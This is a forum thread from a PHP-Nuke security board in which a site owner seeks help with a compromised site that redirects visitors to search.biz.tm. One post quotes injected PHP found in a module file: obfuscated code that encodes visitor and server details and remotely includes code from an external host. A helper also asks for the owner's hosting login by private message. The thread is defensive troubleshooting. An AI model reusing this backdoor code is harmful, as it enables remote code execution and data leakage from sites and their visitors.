>> Site Map >> Forums >> PHP-Nuke Security
Forum module - topics in forum:
PHP-Nuke Security - Been hacked? or have a question about securing your site, here's the place.
Hijacked/Attacked
Anyone with the knowledge to help:
The code redirects to http://search.biz.tm
http://www.airsoft-norge.com
Try different menues.
The code is using javascript, and the web-url i splitted into several parts, so it's difiicult to search for in db and php code.
The script is based just before writecookie code.
Anyone?
Remove the index.html that is redirecting it... going to http://www.airsoft-norge.com/index.php works fine.
There's no index.html in root dir, neider a /html tag at the end of the page doc.
This one is rather nasty...
I've uploaded part of the page doc at:
http://www.airsoft-norge.com/junk.txt
Since I can't paste script-codes here as an example...
BTW, where's the writecookies code fitted? Can't find the module...
Anyone know?
What's this at end of mstrack.php in /modules/MS_Analysis catalog:
| Quote: : |
| error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?> |
---
Well... Now I've updated/upgrade from 7.5 to 7.6, all files overwritten, except from config.php...
Still the same, when selecting different options in menu (left side)...
AAAAAAarg!
---
Update 2:
Just before it redirects me, I get "No Access" in the top description of the windows... and then it redirects me... Some function in PHP-Nuke?
Can't even access /modules/Your_Account or Search etc
---
It's very unlikely to do with the files, you'll need to goto you database, open up the nuke_config table and see if there are any redirects in the footer entries, also open up the nuke_messages table and look through those.
My nuke_config table:
| Quote: : |
INSERT INTO `nuke_config` VALUES ('Airsoft Norge', 'http://www.airsoft-norge.com', '', 'Norges beste airsoft-side', 'September 2002', 'webmaster@airsoft-norge.com', 0, 'Aeolus', 'All logos and trademarks in this site are property of their respective owner. The comments and gallery images are property of their posters, all the rest © 2002-2005 by Airsoft Norge.<br><br><center><img src="/xml.gif"></center>\r\n<a href="/backend.php">NewsRSS</a>', '<br><form action="https://www.paypal.com/cgi-bin/webscr" method="post">\r\n<input type="hidden" name="cmd" value="_xclick">\r\n<input type="hidden" name="business" value="ipetter@gmail.com">\r\n<input type="hidden" name="item_name" value="Airsoft Norge">\r\n<input type="hidden" name="no_note" value="1">\r\n<input type="hidden" name="currency_code" value="USD">\r\n<input type="hidden" name="tax" value="0">\r\n<input type="image" src="https://www.paypal.com/en_US/i/btn/x-click-but04.gif" border="0" name="submit" alt="Make payments with PayPal - it''s fast, free and secure!">\r\n</form>', '<center><a href="http://www.phpnuke.org" target="_blank">PHP-Nuke Copyright © 2004</a><br>', 4096, 'Anonym', 5, 1, 1, 0, 1, 10, 10, 1, 20, 0, 1, 'Airsoft Norge', 'en-NO', 'norwegian', 'no_NO.ISO_8859-1', 0, 0, 0, 'me@yoursite.com', 'NEWS for my site', 'Hey! You got a new submission for your site.', 'webmaster', 'Mail sent from WebMail service at PHP-Nuke Powered Site\n- http://yoursite.com', 0, '/var/www/html/modules/WebMail/tmp/', 0, 0, 'modules/WebMail/attachments/', 'mail.airsoft-norge.com', 0, 'Your account', -1, 'modules/WebMail/images', 1, 1, 1, 1, 1000, 0, '*****', 'Web site engine''s code is Copyright © 2002 by <a href="http://phpnuke.org"><font class=''footmsg_l''>PHP-Nuke</font></a>. All Rights Reserved. PHP-Nuke is Free Software released under the <a href="http://www.gnu.org"><font class=''footmsg_l''>GNU/GPL license</font></a>.', '7.6'); |
Nothing un-normal in nuke_messages
If you want to pm me your hosting control panel login I'll take a look.
It would be far easier for me to look myself then sit here suggesting things to try all evening.
Hello,
i have the same problem with one of my mediawiki sites and my mambo portal. The wiki redirected always to search.biz.tm after using the search box, the mambo portal is totaly down because that code that was added to dozens of files doesn't work. I also heard of users of the phpBB and other scripts who were affected.
The subdomain search.biz.tm belongs to a customer of a customer of a customer of AboveNet Communications Inc. who are investigating now. You can contact them at abuse@above.net.
Cheers
